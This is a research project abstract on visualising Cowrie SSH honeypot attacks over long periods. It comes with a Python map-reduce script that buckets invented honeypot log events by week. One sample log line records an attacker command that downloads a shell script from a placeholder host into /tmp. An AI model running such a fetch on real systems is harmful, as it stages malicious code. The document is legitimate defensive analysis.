Longitudinal Analysis of SSH Honeypot Logs
Keywords: Cybersecurity, SSH honeypots

Abstract
Visualising attacks and attack patterns from Cowrie SSH honeypots is challenging when large volumes of data collected over a long period have to be handled, and the complexity of Cowrie's JSON log files adds to the difficulty. It is nevertheless important to extract meaningful information from these logs in order to identify trends and patterns in attacker activity over a specified period. A command-line tool was developed using a MapReduce programming model to process large amounts of log data efficiently and within an acceptable timeframe. However, the current solution only visualises features extracted over a short timeframe. Gathering and capturing information over an extended timeline can reveal changes in attackers' behaviour between specific periods, complementing the aggregated data that is already accessible. This project applied log data captured from multiple Cowrie honeypot instances deployed by the cybersecurity team at Victoria University of Wellington (VUW) and used it to integrate a longitudinal analysis that visualises attacks and attack patterns over a long period of time.
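The abstract describes processing Cowrie's JSON logs with a MapReduce model and then comparing extracted features across time periods. The following Python script is an added illustration of that approach and is not the project's tool: it reads a handful of constructed Cowrie-style JSON events (the field names eventid, timestamp, src_ip, session, username, password and input follow Cowrie's log format, but the sample lines and addresses are invented), maps each event to per-period feature counts, reduces them, and then compares adjacent weeks to surface credentials or commands that appear for the first time. Malformed lines are counted and skipped rather than aborting the run, since long-term captures routinely contain them.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample lines in Cowrie's JSON log format (invented, not real captures).
# Two sessions fall in ISO week 2020-W10, one in 2020-W11, plus one malformed line.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"a1","timestamp":"2020-03-02T01:02:03.000000Z","sensor":"hp1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.7","session":"a1","timestamp":"2020-03-02T01:02:04.000000Z","sensor":"hp1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"198.51.100.7","session":"a1","timestamp":"2020-03-02T01:02:05.000000Z","sensor":"hp1"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.9","session":"b2","timestamp":"2020-03-04T10:00:00.000000Z","sensor":"hp2"}
{"eventid":"cowrie.login.success","username":"root","password":"root","src_ip":"203.0.113.9","session":"b2","timestamp":"2020-03-04T10:00:01.000000Z","sensor":"hp2"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.9","session":"b2","timestamp":"2020-03-04T10:00:02.000000Z","sensor":"hp2"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"c3","timestamp":"2020-03-11T05:00:00.000000Z","sensor":"hp1"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","src_ip":"198.51.100.7","session":"c3","timestamp":"2020-03-11T05:00:01.000000Z","sensor":"hp1"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://example.invalid/x.sh","src_ip":"198.51.100.7","session":"c3","timestamp":"2020-03-11T05:00:02.000000Z","sensor":"hp1"}
not json at all
"""


def parse_event(line):
    """Decode one log line; return None for blank or malformed lines."""
    line = line.strip()
    if not line:
        return None
    try:
        event = json.loads(line)
    except json.JSONDecodeError:
        return None
    if not isinstance(event, dict) or "eventid" not in event or "timestamp" not in event:
        return None
    return event


def period_of(timestamp, granularity="week"):
    """Bucket a Cowrie ISO-8601 timestamp (trailing 'Z') into a day or ISO week."""
    ts = datetime.fromisoformat(timestamp.rstrip("Z"))
    if granularity == "day":
        return ts.strftime("%Y-%m-%d")
    year, week, _ = ts.isocalendar()
    return f"{year}-W{week:02d}"


def map_event(event, granularity="week"):
    """Map phase: emit ((period, feature, value), 1) pairs for one event."""
    period = period_of(event["timestamp"], granularity)
    eid = event["eventid"]
    pairs = [((period, "events", eid), 1)]
    if eid in ("cowrie.login.failed", "cowrie.login.success"):
        pairs.append(((period, "username", event.get("username", "")), 1))
        pairs.append(((period, "password", event.get("password", "")), 1))
    elif eid == "cowrie.session.connect":
        pairs.append(((period, "src_ip", event.get("src_ip", "")), 1))
    elif eid == "cowrie.command.input":
        pairs.append(((period, "command", event.get("input", "")), 1))
    return pairs


def reduce_pairs(pairs):
    """Reduce phase: sum the counts emitted for each key."""
    totals = Counter()
    for key, n in pairs:
        totals[key] += n
    return totals


def analyse(lines, granularity="week"):
    """Run map and reduce over raw lines; return (stats, skipped_line_count).

    stats[period][feature] is a Counter of values for that period.
    """
    pairs, skipped = [], 0
    for line in lines:
        event = parse_event(line)
        if event is None:
            skipped += 1
            continue
        pairs.extend(map_event(event, granularity))
    stats = defaultdict(lambda: defaultdict(Counter))
    for (period, feature, value), n in reduce_pairs(pairs).items():
        stats[period][feature][value] += n
    return stats, skipped


def login_success_rate(stats, period):
    """Fraction of login attempts in a period that succeeded (0.0 if none)."""
    ev = stats[period]["events"]
    attempts = ev["cowrie.login.failed"] + ev["cowrie.login.success"]
    return ev["cowrie.login.success"] / attempts if attempts else 0.0


def new_values(stats, feature, earlier, later):
    """Values of a feature seen in the later period but not the earlier one."""
    return set(stats[later][feature]) - set(stats[earlier][feature])


if __name__ == "__main__":
    stats, skipped = analyse(SAMPLE_LOG.splitlines())
    periods = sorted(stats)
    print(f"skipped {skipped} malformed line(s)")
    for p in periods:
        print(p, "success rate", round(login_success_rate(stats, p), 2),
              "top usernames", stats[p]["username"].most_common(3))
    for earlier, later in zip(periods, periods[1:]):
        print(f"{earlier} -> {later} new commands:", new_values(stats, "command", earlier, later))
```

Grouping by ISO week rather than day keeps the number of buckets manageable over a multi-year capture; the `granularity` parameter lets the same map phase be reused for daily resolution when a short window needs closer inspection.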